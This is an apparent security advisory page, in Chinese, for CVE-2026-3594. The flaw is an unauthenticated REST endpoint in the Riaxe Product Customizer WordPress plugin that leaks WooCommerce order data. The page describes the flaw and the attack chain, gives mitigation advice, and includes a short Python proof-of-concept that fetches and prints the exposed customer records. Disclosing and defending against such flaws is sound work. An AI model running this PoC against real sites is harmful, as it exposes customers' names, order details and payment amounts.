IPBUF安全漏洞报告
English
CVE-2026-3594 CVSS 5.3 中危

CVE-2026-3594 WordPress插件敏感信息泄露

披露日期: 2026-04-08

漏洞信息

漏洞编号
CVE-2026-3594
漏洞类型
敏感信息泄露
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Riaxe Product Customizer (WordPress Plugin)

相关标签

敏感信息泄露WordPressWooCommerceREST API权限绕过

漏洞概述

WordPress Riaxe Product Customizer插件在所有版本(包括2.4版)中存在敏感信息泄露漏洞。由于'/wp-json/InkXEProductDesignerLite/orders' REST API端点未设置有效的权限检查,导致未经身份验证的攻击者可直接访问该接口。攻击者可利用此漏洞从数据库中获取WooCommerce商店的敏感订单数据,包括客户姓名、ID、订单详情、金额及日期等,造成严重的数据泄露风险。

技术细节

该漏洞源于插件在注册REST API路由时的权限配置失误。具体代码中,端点'/wp-json/InkXEProductDesignerLite/orders'将'permission_callback'参数硬编码为'__return_true',这导致WordPress系统在处理请求时完全跳过身份验证和授权机制。正常情况下,访问订单数据需要管理员或经过授权的用户权限,但此配置允许任何匿名用户发起请求。后端代码直接查询WooCommerce的订单表,检索包括客户姓名、ID、订单金额、日期及货币等敏感字段,并以JSON格式返回给请求者。由于缺乏访问控制,攻击者可通过简单的HTTP GET请求批量遍历并窃取平台的订单记录。

攻击链分析

STEP 1
侦察
攻击者识别目标网站安装了Riaxe Product Customizer插件。
STEP 2
漏洞利用
攻击者构造并发送针对'/wp-json/InkXEProductDesignerLite/orders'的未授权GET请求。
STEP 3
数据泄露
服务器由于权限校验失效,直接返回WooCommerce订单数据(含客户敏感信息)。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def check_vuln(target_url): """ Exploit for CVE-2026-3594 Checks for sensitive info exposure via unauthenticated REST API endpoint. """ # The vulnerable endpoint path endpoint = "/wp-json/InkXEProductDesignerLite/orders" full_url = target_url.rstrip("/") + endpoint try: # Send GET request without authentication response = requests.get(full_url, timeout=10) if response.status_code == 200: print(f"[+] Target is vulnerable: {full_url}") print("[+] Data retrieved:") print(response.json()) else: print(f"[-] Target not vulnerable or plugin not active. Status code: {response.status_code}") except Exception as e: print(f"[!] Error occurred: {e}") if __name__ == "__main__": target = "http://example.com" # Replace with target URL check_vuln(target)

影响范围

Riaxe Product Customizer <= 2.4

防御指南

临时缓解措施
如果暂时无法升级插件,建议立即通过Web服务器配置(如Nginx或Apache规则)阻断对'/wp-json/InkXEProductDesignerLite/orders'路径的外部访问请求,或者暂时停用该插件以防止数据泄露。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表